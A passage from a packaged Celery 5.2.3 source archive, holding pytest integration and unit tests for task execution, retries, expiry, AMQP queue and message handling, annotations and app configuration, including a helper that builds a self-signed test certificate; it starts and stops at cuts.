x509.NameAttribute(NameOID.COMMON_NAME, common_name), ]) ).issuer_name( x509.Name([ x509.NameAttribute( NameOID.COMMON_NAME, issuer or common_name ) ]) ).not_valid_before( now ).not_valid_after( now + datetime.timedelta(seconds=86400) ).serial_number( x509.random_serial_number() ).public_key( key.public_key() ).add_extension( x509.BasicConstraints(ca=True, path_length=0), critical=True ).sign( private_key=sign_key or key, algorithm=hashes.SHA256(), backend=default_backend() ) return certificate @pytest.mark.xfail(reason="Issue #5269") def test_security_task_done(self): t1 = add.delay(1, 1) assert t1.get() == 2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_tasks.py0000664000175000017500000002403200000000000020222 0ustar00asifasif00000000000000from datetime import datetime, timedelta from time import perf_counter, sleep import pytest import celery from celery import group from .conftest import get_active_redis_channels from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add, add_ignore_result, add_not_typed, fail, print_unicode, retry, retry_once, retry_once_priority, return_properties, sleeping) TIMEOUT = 10 _flaky = pytest.mark.flaky(reruns=5, reruns_delay=2) _timeout = pytest.mark.timeout(timeout=300) def flaky(fn): return _timeout(_flaky(fn)) class test_class_based_tasks: @flaky def test_class_based_task_retried(self, celery_session_app, celery_session_worker): task = ClassBasedAutoRetryTask() celery_session_app.tasks.register(task) res = task.delay() assert res.get(timeout=TIMEOUT) == 1 def _producer(j): """Single producer helper function""" results = [] for i in range(20): results.append([i + j, add.delay(i, j)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True return j class test_tasks: def test_simple_call(self): """Tests direct simple call of task""" assert add(1, 1) == 2 assert add(1, 1, z=1) == 3 @flaky def test_basic_task(self, manager): """Tests basic task call""" results = [] # Tests calling task only with args for i in range(10): results.append([i + i, add.delay(i, i)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True results = [] # Tests calling task with args and kwargs for i in range(10): results.append([3*i, add.delay(i, i, z=i)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True @flaky def test_multiprocess_producer(self, manager): """Testing multiple processes calling tasks.""" from multiprocessing import Pool pool = Pool(20) ret = pool.map(_producer, range(120)) assert list(ret) == list(range(120)) @flaky def test_multithread_producer(self, manager): """Testing multiple threads calling tasks.""" from multiprocessing.pool import ThreadPool pool = ThreadPool(20) ret = pool.map(_producer, range(120)) assert list(ret) == list(range(120)) @flaky def test_ignore_result(self, manager): """Testing calling task with ignoring results.""" result = add.apply_async((1, 2), ignore_result=True) assert result.get() is None # We wait since it takes a bit of time for the result to be # persisted in the result backend. sleep(1) assert result.result is None @flaky def test_timeout(self, manager): """Testing timeout of getting results from tasks.""" result = sleeping.delay(10) with pytest.raises(celery.exceptions.TimeoutError): result.get(timeout=5) @flaky def test_expired(self, manager): """Testing expiration of task.""" # Fill the queue with tasks which took > 1 sec to process for _ in range(4): sleeping.delay(2) # Execute task with expiration = 1 sec result = add.apply_async((1, 1), expires=1) with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False # Fill the queue with tasks which took > 1 sec to process for _ in range(4): sleeping.delay(2) # Execute task with expiration at now + 1 sec result = add.apply_async((1, 1), expires=datetime.utcnow() + timedelta(seconds=1)) with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False @flaky def test_eta(self, manager): """Tests tasks scheduled at some point in future.""" start = perf_counter() # Schedule task to be executed in 3 seconds result = add.apply_async((1, 1), countdown=3) sleep(1) assert result.status == 'PENDING' assert result.ready() is False assert result.get() == 2 end = perf_counter() assert result.status == 'SUCCESS' assert result.ready() is True # Difference between calling the task and result must be bigger than 3 secs assert (end - start) > 3 start = perf_counter() # Schedule task to be executed at time now + 3 seconds result = add.apply_async((2, 2), eta=datetime.utcnow() + timedelta(seconds=3)) sleep(1) assert result.status == 'PENDING' assert result.ready() is False assert result.get() == 4 end = perf_counter() assert result.status == 'SUCCESS' assert result.ready() is True # Difference between calling the task and result must be bigger than 3 secs assert (end - start) > 3 @flaky def test_fail(self, manager): """Tests that the failing task propagates back correct exception.""" result = fail.delay() with pytest.raises(ExpectedException): result.get(timeout=5) assert result.status == 'FAILURE' assert result.ready() is True assert result.failed() is True assert result.successful() is False @flaky def test_revoked(self, manager): """Testing revoking of task""" # Fill the queue with tasks to fill the queue for _ in range(4): sleeping.delay(2) # Execute task and revoke it result = add.apply_async((1, 1)) result.revoke() with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False @flaky def test_wrong_arguments(self, manager): """Tests that proper exceptions are raised when task is called with wrong arguments.""" with pytest.raises(TypeError): add(5) with pytest.raises(TypeError): add(5, 5, wrong_arg=5) with pytest.raises(TypeError): add.delay(5) with pytest.raises(TypeError): add.delay(5, wrong_arg=5) # Tasks with typing=False are not checked but execution should fail result = add_not_typed.delay(5) with pytest.raises(TypeError): result.get(timeout=5) assert result.status == 'FAILURE' result = add_not_typed.delay(5, wrong_arg=5) with pytest.raises(TypeError): result.get(timeout=5) assert result.status == 'FAILURE' @flaky def test_retry(self, manager): """Tests retrying of task.""" # Tests when max. retries is reached result = retry.delay() for _ in range(5): status = result.status if status != 'PENDING': break sleep(1) assert status == 'RETRY' with pytest.raises(ExpectedException): result.get() assert result.status == 'FAILURE' # Tests when task is retried but after returns correct result result = retry.delay(return_value='bar') for _ in range(5): status = result.status if status != 'PENDING': break sleep(1) assert status == 'RETRY' assert result.get() == 'bar' assert result.status == 'SUCCESS' @flaky def test_task_accepted(self, manager, sleep=1): r1 = sleeping.delay(sleep) sleeping.delay(sleep) manager.assert_accepted([r1.id]) @flaky def test_task_retried(self): res = retry_once.delay() assert res.get(timeout=TIMEOUT) == 1 # retried once @flaky def test_task_retried_priority(self): res = retry_once_priority.apply_async(priority=7) assert res.get(timeout=TIMEOUT) == 7 # retried once with priority 7 @flaky def test_unicode_task(self, manager): manager.join( group(print_unicode.s() for _ in range(5))(), timeout=TIMEOUT, propagate=True, ) @flaky def test_properties(self, celery_session_worker): res = return_properties.apply_async(app_id="1234") assert res.get(timeout=TIMEOUT)["app_id"] == "1234" class tests_task_redis_result_backend: def setup(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') def test_ignoring_result_no_subscriptions(self): assert get_active_redis_channels() == [] result = add_ignore_result.delay(1, 2) assert result.ignored is True assert get_active_redis_channels() == [] def test_asyncresult_forget_cancels_subscription(self): result = add.delay(1, 2) assert get_active_redis_channels() == [ f"celery-task-meta-{result.id}" ] result.forget() assert get_active_redis_channels() == [] def test_asyncresult_get_cancels_subscription(self): result = add.delay(1, 2) assert get_active_redis_channels() == [ f"celery-task-meta-{result.id}" ] assert result.get(timeout=3) == 3 assert get_active_redis_channels() == [] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/skip.py0000664000175000017500000000034200000000000014457 0ustar00asifasif00000000000000import sys import pytest if_pypy = pytest.mark.skipif(getattr(sys, 'pypy_version_info', None), reason='PyPy not supported.') if_win32 = pytest.mark.skipif(sys.platform.startswith('win32'), reason='Does not work on Windows') ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7597558 celery-5.2.3/t/unit/0000775000175000017500000000000000000000000014117 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/__init__.py0000664000175000017500000000000000000000000016216 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7717562 celery-5.2.3/t/unit/app/0000775000175000017500000000000000000000000014677 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/__init__.py0000664000175000017500000000000000000000000016776 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_amqp.py0000664000175000017500000003137000000000000017252 0ustar00asifasif00000000000000from datetime import datetime, timedelta from unittest.mock import Mock, patch import pytest from kombu import Exchange, Queue from celery import uuid from celery.app.amqp import Queues, utf8dict from celery.utils.time import to_utc class test_TaskConsumer: def test_accept_content(self, app): with app.pool.acquire(block=True) as con: app.conf.accept_content = ['application/json'] assert app.amqp.TaskConsumer(con).accept == { 'application/json', } assert app.amqp.TaskConsumer(con, accept=['json']).accept == { 'application/json', } class test_ProducerPool: def test_setup_nolimit(self, app): app.conf.broker_pool_limit = None try: delattr(app, '_pool') except AttributeError: pass app.amqp._producer_pool = None pool = app.amqp.producer_pool assert pool.limit == app.pool.limit assert not pool._resource.queue r1 = pool.acquire() r2 = pool.acquire() r1.release() r2.release() r1 = pool.acquire() r2 = pool.acquire() def test_setup(self, app): app.conf.broker_pool_limit = 2 try: delattr(app, '_pool') except AttributeError: pass app.amqp._producer_pool = None pool = app.amqp.producer_pool assert pool.limit == app.pool.limit assert pool._resource.queue p1 = r1 = pool.acquire() p2 = r2 = pool.acquire() r1.release() r2.release() r1 = pool.acquire() r2 = pool.acquire() assert p2 is r1 assert p1 is r2 r1.release() r2.release() class test_Queues: def test_queues_format(self): self.app.amqp.queues._consume_from = {} assert self.app.amqp.queues.format() == '' def test_with_defaults(self): assert Queues(None) == {} def test_add(self): q = Queues() q.add('foo', exchange='ex', routing_key='rk') assert 'foo' in q assert isinstance(q['foo'], Queue) assert q['foo'].routing_key == 'rk' def test_setitem_adds_default_exchange(self): q = Queues(default_exchange=Exchange('bar')) assert q.default_exchange queue = Queue('foo', exchange=None) queue.exchange = None q['foo'] = queue assert q['foo'].exchange == q.default_exchange def test_select_add(self): q = Queues() q.select(['foo', 'bar']) q.select_add('baz') assert sorted(q._consume_from.keys()) == ['bar', 'baz', 'foo'] def test_deselect(self): q = Queues() q.select(['foo', 'bar']) q.deselect('bar') assert sorted(q._consume_from.keys()) == ['foo'] def test_add_default_exchange(self): ex = Exchange('fff', 'fanout') q = Queues(default_exchange=ex) q.add(Queue('foo')) assert q['foo'].exchange.name == 'fff' def test_alias(self): q = Queues() q.add(Queue('foo', alias='barfoo')) assert q['barfoo'] is q['foo'] @pytest.mark.parametrize('queues_kwargs,qname,q,expected', [ ({'max_priority': 10}, 'foo', 'foo', {'x-max-priority': 10}), ({'max_priority': 10}, 'xyz', Queue('xyz', queue_arguments={'x-max-priority': 3}), {'x-max-priority': 3}), ({'max_priority': 10}, 'moo', Queue('moo', queue_arguments=None), {'x-max-priority': 10}), ({'max_priority': None}, 'foo2', 'foo2', None), ({'max_priority': None}, 'xyx3', Queue('xyx3', queue_arguments={'x-max-priority': 7}), {'x-max-priority': 7}), ]) def test_with_max_priority(self, queues_kwargs, qname, q, expected): queues = Queues(**queues_kwargs) queues.add(q) assert queues[qname].queue_arguments == expected class test_default_queues: @pytest.mark.parametrize('name,exchange,rkey', [ ('default', None, None), ('default', 'exchange', None), ('default', 'exchange', 'routing_key'), ('default', None, 'routing_key'), ]) def test_setting_default_queue(self, name, exchange, rkey): self.app.conf.task_queues = {} self.app.conf.task_default_exchange = exchange self.app.conf.task_default_routing_key = rkey self.app.conf.task_default_queue = name assert self.app.amqp.queues.default_exchange.name == exchange or name queues = dict(self.app.amqp.queues) assert len(queues) == 1 queue = queues[name] assert queue.exchange.name == exchange or name assert queue.exchange.type == 'direct' assert queue.routing_key == rkey or name class test_default_exchange: @pytest.mark.parametrize('name,exchange,rkey', [ ('default', 'foo', None), ('default', 'foo', 'routing_key'), ]) def test_setting_default_exchange(self, name, exchange, rkey): q = Queue(name, routing_key=rkey) self.app.conf.task_queues = {q} self.app.conf.task_default_exchange = exchange queues = dict(self.app.amqp.queues) queue = queues[name] assert queue.exchange.name == exchange @pytest.mark.parametrize('name,extype,rkey', [ ('default', 'direct', None), ('default', 'direct', 'routing_key'), ('default', 'topic', None), ('default', 'topic', 'routing_key'), ]) def test_setting_default_exchange_type(self, name, extype, rkey): q = Queue(name, routing_key=rkey) self.app.conf.task_queues = {q} self.app.conf.task_default_exchange_type = extype queues = dict(self.app.amqp.queues) queue = queues[name] assert queue.exchange.type == extype class test_AMQP_proto1: def test_kwargs_must_be_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v1(uuid(), 'foo', kwargs=[1, 2]) def test_args_must_be_list(self): with pytest.raises(TypeError): self.app.amqp.as_task_v1(uuid(), 'foo', args='abc') def test_countdown_negative(self): with pytest.raises(ValueError): self.app.amqp.as_task_v1(uuid(), 'foo', countdown=-1232132323123) def test_as_task_message_without_utc(self): self.app.amqp.utc = False self.app.amqp.as_task_v1(uuid(), 'foo', countdown=30, expires=40) class test_AMQP: def setup(self): self.simple_message = self.app.amqp.as_task_v2( uuid(), 'foo', create_sent_event=True, ) self.simple_message_no_sent_event = self.app.amqp.as_task_v2( uuid(), 'foo', create_sent_event=False, ) def test_kwargs_must_be_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', kwargs=[1, 2]) def test_args_must_be_list(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', args='abc') def test_countdown_negative(self): with pytest.raises(ValueError): self.app.amqp.as_task_v2(uuid(), 'foo', countdown=-1232132323123) def test_Queues__with_max_priority(self): x = self.app.amqp.Queues({}, max_priority=23) assert x.max_priority == 23 def test_send_task_message__no_kwargs(self): self.app.amqp.send_task_message(Mock(), 'foo', self.simple_message) def test_send_task_message__properties(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, foo=1, retry=False, ) assert prod.publish.call_args[1]['foo'] == 1 def test_send_task_message__headers(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, headers={'x1x': 'y2x'}, retry=False, ) assert prod.publish.call_args[1]['headers']['x1x'] == 'y2x' def test_send_task_message__queue_string(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='foo', retry=False, ) kwargs = prod.publish.call_args[1] assert kwargs['routing_key'] == 'foo' assert kwargs['exchange'] == '' def test_send_task_message__broadcast_without_exchange(self): from kombu.common import Broadcast evd = Mock(name='evd') self.app.amqp.send_task_message( Mock(), 'foo', self.simple_message, retry=False, routing_key='xyz', queue=Broadcast('abc'), event_dispatcher=evd, ) evd.publish.assert_called() event = evd.publish.call_args[0][1] assert event['routing_key'] == 'xyz' assert event['exchange'] == 'abc' def test_send_event_exchange_direct_with_exchange(self): prod = Mock(name='prod') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='bar', retry=False, exchange_type='direct', exchange='xyz', ) prod.publish.assert_called() pub = prod.publish.call_args[1] assert pub['routing_key'] == 'bar' assert pub['exchange'] == '' def test_send_event_exchange_direct_with_routing_key(self): prod = Mock(name='prod') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, queue='bar', retry=False, exchange_type='direct', routing_key='xyb', ) prod.publish.assert_called() pub = prod.publish.call_args[1] assert pub['routing_key'] == 'bar' assert pub['exchange'] == '' def test_send_event_exchange_string(self): evd = Mock(name='evd') self.app.amqp.send_task_message( Mock(), 'foo', self.simple_message, retry=False, exchange='xyz', routing_key='xyb', event_dispatcher=evd, ) evd.publish.assert_called() event = evd.publish.call_args[0][1] assert event['routing_key'] == 'xyb' assert event['exchange'] == 'xyz' def test_send_task_message__with_delivery_mode(self): prod = Mock(name='producer') self.app.amqp.send_task_message( prod, 'foo', self.simple_message_no_sent_event, delivery_mode=33, retry=False, ) assert prod.publish.call_args[1]['delivery_mode'] == 33 def test_send_task_message__with_receivers(self): mocked_receiver = ((Mock(), Mock()), Mock()) with patch('celery.signals.task_sent.receivers', [mocked_receiver]): self.app.amqp.send_task_message(Mock(), 'foo', self.simple_message) def test_routes(self): r1 = self.app.amqp.routes r2 = self.app.amqp.routes assert r1 is r2 def update_conf_runtime_for_tasks_queues(self): self.app.conf.update(task_routes={'task.create_pr': 'queue.qwerty'}) self.app.send_task('task.create_pr') router_was = self.app.amqp.router self.app.conf.update(task_routes={'task.create_pr': 'queue.asdfgh'}) self.app.send_task('task.create_pr') router = self.app.amqp.router assert router != router_was class test_as_task_v2: def test_raises_if_args_is_not_tuple(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', args='123') def test_raises_if_kwargs_is_not_mapping(self): with pytest.raises(TypeError): self.app.amqp.as_task_v2(uuid(), 'foo', kwargs=(1, 2, 3)) def test_countdown_to_eta(self): now = to_utc(datetime.utcnow()).astimezone(self.app.timezone) m = self.app.amqp.as_task_v2( uuid(), 'foo', countdown=10, now=now, ) assert m.headers['eta'] == (now + timedelta(seconds=10)).isoformat() def test_expires_to_datetime(self): now = to_utc(datetime.utcnow()).astimezone(self.app.timezone) m = self.app.amqp.as_task_v2( uuid(), 'foo', expires=30, now=now, ) assert m.headers['expires'] == ( now + timedelta(seconds=30)).isoformat() def test_eta_to_datetime(self): eta = datetime.utcnow() m = self.app.amqp.as_task_v2( uuid(), 'foo', eta=eta, ) assert m.headers['eta'] == eta.isoformat() def test_callbacks_errbacks_chord(self): @self.app.task def t(i): pass m = self.app.amqp.as_task_v2( uuid(), 'foo', callbacks=[t.s(1), t.s(2)], errbacks=[t.s(3), t.s(4)], chord=t.s(5), ) _, _, embed = m.body assert embed['callbacks'] == [utf8dict(t.s(1)), utf8dict(t.s(2))] assert embed['errbacks'] == [utf8dict(t.s(3)), utf8dict(t.s(4))] assert embed['chord'] == utf8dict(t.s(5)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_annotations.py0000664000175000017500000000246300000000000020652 0ustar00asifasif00000000000000from celery.app.annotations import MapAnnotation, prepare from celery.utils.imports import qualname class MyAnnotation: foo = 65 class AnnotationCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False) def mul(x, y): return x * y self.mul = mul class test_MapAnnotation(AnnotationCase): def test_annotate(self): x = MapAnnotation({self.add.name: {'foo': 1}}) assert x.annotate(self.add) == {'foo': 1} assert x.annotate(self.mul) is None def test_annotate_any(self): x = MapAnnotation({'*': {'foo': 2}}) assert x.annotate_any() == {'foo': 2} x = MapAnnotation() assert x.annotate_any() is None class test_prepare(AnnotationCase): def test_dict_to_MapAnnotation(self): x = prepare({self.add.name: {'foo': 3}}) assert isinstance(x[0], MapAnnotation) def test_returns_list(self): assert prepare(1) == [1] assert prepare([1]) == [1] assert prepare((1,)) == [1] assert prepare(None) == () def test_evalutes_qualnames(self): assert prepare(qualname(MyAnnotation))[0]().foo == 65 assert prepare([qualname(MyAnnotation)])[0]().foo == 65 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_app.py0000664000175000017500000011467400000000000017105 0ustar00asifasif00000000000000import gc import itertools import os import ssl import uuid from copy import deepcopy from datetime import datetime, timedelta from pickle import dumps, loads from unittest.mock import Mock, patch import pytest from vine import promise from celery import Celery, _state from celery import app as _app from celery import current_app, shared_task from celery.app import base as _appbase from celery.app import defaults from celery.backends.base import Backend from celery.contrib.testing.mocks import ContextMock from celery.exceptions import ImproperlyConfigured from celery.loaders.base import unconfigured from celery.platforms import pyimplementation from celery.utils.collections import DictAttribute from celery.utils.objects import Bunch from celery.utils.serialization import pickle from celery.utils.time import localize, timezone, to_utc from t.unit import conftest THIS_IS_A_KEY = 'this is a value' class ObjectConfig: FOO = 1 BAR = 2 object_config = ObjectConfig() dict_config = {'FOO': 10, 'BAR': 20} class ObjectConfig2: LEAVE_FOR_WORK = True MOMENT_TO_STOP = True CALL_ME_BACK = 123456789 WANT_ME_TO = False UNDERSTAND_ME = True class test_module: def test_default_app(self): assert _app.default_app == _state.default_app def test_bugreport(self, app): assert _app.bugreport(app=app) class test_task_join_will_block: def test_task_join_will_block(self, patching): patching('celery._state._task_join_will_block', 0) assert _state._task_join_will_block == 0 _state._set_task_join_will_block(True) assert _state._task_join_will_block is True # fixture 'app' sets this, so need to use orig_ function # set there by that fixture. res = _state.orig_task_join_will_block() assert res is True class test_App: def setup(self): self.app.add_defaults(deepcopy(self.CELERY_TEST_CONFIG)) def test_now(self): timezone_setting_value = 'US/Eastern' tz_utc = timezone.get_timezone('UTC') tz_us_eastern = timezone.get_timezone(timezone_setting_value) now = to_utc(datetime.utcnow()) app_now = self.app.now() assert app_now.tzinfo is tz_utc assert app_now - now <= timedelta(seconds=1) # Check that timezone conversion is applied from configuration self.app.conf.enable_utc = False self.app.conf.timezone = timezone_setting_value # timezone is a cached property del self.app.timezone app_now = self.app.now() assert app_now.tzinfo.zone == tz_us_eastern.zone diff = to_utc(datetime.utcnow()) - localize(app_now, tz_utc) assert diff <= timedelta(seconds=1) # Verify that timezone setting overrides enable_utc=on setting self.app.conf.enable_utc = True del self.app.timezone app_now = self.app.now() assert self.app.timezone == tz_us_eastern assert app_now.tzinfo.zone == tz_us_eastern.zone @patch('celery.app.base.set_default_app') def test_set_default(self, set_default_app): self.app.set_default() set_default_app.assert_called_with(self.app) @patch('celery.security.setup_security') def test_setup_security(self, setup_security): self.app.setup_security( {'json'}, 'key', 'cert', 'store', 'digest', 'serializer') setup_security.assert_called_with( {'json'}, 'key', 'cert', 'store', 'digest', 'serializer', app=self.app) def test_task_autofinalize_disabled(self): with self.Celery('xyzibari', autofinalize=False) as app: @app.task def ttafd(): return 42 with pytest.raises(RuntimeError): ttafd() with self.Celery('xyzibari', autofinalize=False) as app: @app.task def ttafd2(): return 42 app.finalize() assert ttafd2() == 42 def test_registry_autofinalize_disabled(self): with self.Celery('xyzibari', autofinalize=False) as app: with pytest.raises(RuntimeError): app.tasks['celery.chain'] app.finalize() assert app.tasks['celery.chain'] def test_task(self): with self.Celery('foozibari') as app: def fun(): pass fun.__module__ = '__main__' task = app.task(fun) assert task.name == app.main + '.fun' def test_task_too_many_args(self): with pytest.raises(TypeError): self.app.task(Mock(name='fun'), True) with pytest.raises(TypeError): self.app.task(Mock(name='fun'), True, 1, 2) def test_with_config_source(self): with self.Celery(config_source=ObjectConfig) as app: assert app.conf.FOO == 1 assert app.conf.BAR == 2 @pytest.mark.usefixtures('depends_on_current_app') def test_task_windows_execv(self): prev, _appbase.USING_EXECV = _appbase.USING_EXECV, True try: @self.app.task(shared=False) def foo(): pass assert foo._get_current_object() # is proxy finally: _appbase.USING_EXECV = prev assert not _appbase.USING_EXECV def test_task_takes_no_args(self): with pytest.raises(TypeError): @self.app.task(1) def foo(): pass def test_add_defaults(self): assert not self.app.configured _conf = {'foo': 300} def conf(): return _conf self.app.add_defaults(conf) assert conf in self.app._pending_defaults assert not self.app.configured assert self.app.conf.foo == 300 assert self.app.configured assert not self.app._pending_defaults # defaults not pickled appr = loads(dumps(self.app)) with pytest.raises(AttributeError): appr.conf.foo # add more defaults after configured conf2 = {'foo': 'BAR'} self.app.add_defaults(conf2) assert self.app.conf.foo == 'BAR' assert _conf in self.app.conf.defaults assert conf2 in self.app.conf.defaults def test_connection_or_acquire(self): with self.app.connection_or_acquire(block=True): assert self.app.pool._dirty with self.app.connection_or_acquire(pool=False): assert not self.app.pool._dirty def test_using_v1_reduce(self): self.app._using_v1_reduce = True assert loads(dumps(self.app)) def test_autodiscover_tasks_force_fixup_fallback(self): self.app.loader.autodiscover_tasks = Mock() self.app.autodiscover_tasks([], force=True) self.app.loader.autodiscover_tasks.assert_called_with( [], 'tasks', ) def test_autodiscover_tasks_force(self): self.app.loader.autodiscover_tasks = Mock() self.app.autodiscover_tasks(['proj.A', 'proj.B'], force=True) self.app.loader.autodiscover_tasks.assert_called_with( ['proj.A', 'proj.B'], 'tasks', ) self.app.loader.autodiscover_tasks = Mock() def lazy_list(): return ['proj.A', 'proj.B'] self.app.autodiscover_tasks( lazy_list, related_name='george', force=True, ) self.app.loader.autodiscover_tasks.assert_called_with( ['proj.A', 'proj.B'], 'george', ) def test_autodiscover_tasks_lazy(self): with patch('celery.signals.import_modules') as import_modules: def lazy_list(): return [1, 2, 3] self.app.autodiscover_tasks(lazy_list) import_modules.connect.assert_called() prom = import_modules.connect.call_args[0][0] assert isinstance(prom, promise) assert prom.fun == self.app._autodiscover_tasks assert prom.args[0](), [1, 2 == 3] def test_autodiscover_tasks__no_packages(self): fixup1 = Mock(name='fixup') fixup2 = Mock(name='fixup') self.app._autodiscover_tasks_from_names = Mock(name='auto') self.app._fixups = [fixup1, fixup2] fixup1.autodiscover_tasks.return_value = ['A', 'B', 'C'] fixup2.autodiscover_tasks.return_value = ['D', 'E', 'F'] self.app.autodiscover_tasks(force=True) self.app._autodiscover_tasks_from_names.assert_called_with( ['A', 'B', 'C', 'D', 'E', 'F'], related_name='tasks', ) def test_with_broker(self, patching): patching.setenv('CELERY_BROKER_URL', '') with self.Celery(broker='foo://baribaz') as app: assert app.conf.broker_url == 'foo://baribaz' def test_pending_configuration_non_true__kwargs(self): with self.Celery(task_create_missing_queues=False) as app: assert app.conf.task_create_missing_queues is False def test_pending_configuration__kwargs(self): with self.Celery(foo='bar') as app: assert app.conf.foo == 'bar' def test_pending_configuration__setattr(self): with self.Celery(broker='foo://bar') as app: app.conf.task_default_delivery_mode = 44 app.conf.worker_agent = 'foo:Bar' assert not app.configured assert app.conf.worker_agent == 'foo:Bar' assert app.conf.broker_url == 'foo://bar' assert app._preconf['worker_agent'] == 'foo:Bar' assert app.configured reapp = pickle.loads(pickle.dumps(app)) assert reapp._preconf['worker_agent'] == 'foo:Bar' assert not reapp.configured assert reapp.conf.worker_agent == 'foo:Bar' assert reapp.configured assert reapp.conf.broker_url == 'foo://bar' assert reapp._preconf['worker_agent'] == 'foo:Bar' def test_pending_configuration__update(self): with self.Celery(broker='foo://bar') as app: app.conf.update( task_default_delivery_mode=44, worker_agent='foo:Bar', ) assert not app.configured assert app.conf.worker_agent == 'foo:Bar' assert app.conf.broker_url == 'foo://bar' assert app._preconf['worker_agent'] == 'foo:Bar' def test_pending_configuration__compat_settings(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( CELERY_ALWAYS_EAGER=4, CELERY_DEFAULT_DELIVERY_MODE=63, CELERYD_AGENT='foo:Barz', ) assert app.conf.task_always_eager == 4 assert app.conf.task_default_delivery_mode == 63 assert app.conf.worker_agent == 'foo:Barz' assert app.conf.broker_url == 'foo://bar' assert app.conf.result_backend == 'foo' def test_pending_configuration__compat_settings_mixing(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( CELERY_ALWAYS_EAGER=4, CELERY_DEFAULT_DELIVERY_MODE=63, CELERYD_AGENT='foo:Barz', worker_consumer='foo:Fooz', ) with pytest.raises(ImproperlyConfigured): assert app.conf.task_always_eager == 4 def test_pending_configuration__django_settings(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.config_from_object(DictAttribute(Bunch( CELERY_TASK_ALWAYS_EAGER=4, CELERY_TASK_DEFAULT_DELIVERY_MODE=63, CELERY_WORKER_AGENT='foo:Barz', CELERY_RESULT_SERIALIZER='pickle', )), namespace='CELERY') assert app.conf.result_serializer == 'pickle' assert app.conf.CELERY_RESULT_SERIALIZER == 'pickle' assert app.conf.task_always_eager == 4 assert app.conf.task_default_delivery_mode == 63 assert app.conf.worker_agent == 'foo:Barz' assert app.conf.broker_url == 'foo://bar' assert app.conf.result_backend == 'foo' def test_pending_configuration__compat_settings_mixing_new(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( task_always_eager=4, task_default_delivery_mode=63, worker_agent='foo:Barz', CELERYD_CONSUMER='foo:Fooz', CELERYD_AUTOSCALER='foo:Xuzzy', ) with pytest.raises(ImproperlyConfigured): assert app.conf.worker_consumer == 'foo:Fooz' def test_pending_configuration__compat_settings_mixing_alt(self): with self.Celery(broker='foo://bar', backend='foo') as app: app.conf.update( task_always_eager=4, task_default_delivery_mode=63, worker_agent='foo:Barz', CELERYD_CONSUMER='foo:Fooz', worker_consumer='foo:Fooz', CELERYD_AUTOSCALER='foo:Xuzzy', worker_autoscaler='foo:Xuzzy' ) def test_pending_configuration__setdefault(self): with self.Celery(broker='foo://bar') as app: assert not app.configured app.conf.setdefault('worker_agent', 'foo:Bar') assert not app.configured def test_pending_configuration__iter(self): with self.Celery(broker='foo://bar') as app: app.conf.worker_agent = 'foo:Bar' assert not app.configured assert list(app.conf.keys()) assert app.configured assert 'worker_agent' in app.conf assert dict(app.conf) def test_pending_configuration__raises_ImproperlyConfigured(self): with self.Celery(set_as_current=False) as app: app.conf.worker_agent = 'foo://bar' app.conf.task_default_delivery_mode = 44 app.conf.CELERY_ALWAYS_EAGER = 5 with pytest.raises(ImproperlyConfigured): app.finalize() with self.Celery() as app: assert not self.app.conf.task_always_eager def test_pending_configuration__ssl_settings(self): with self.Celery(broker='foo://bar', broker_use_ssl={ 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key'}, redis_backend_use_ssl={ 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key'}) as app: assert not app.configured assert app.conf.broker_url == 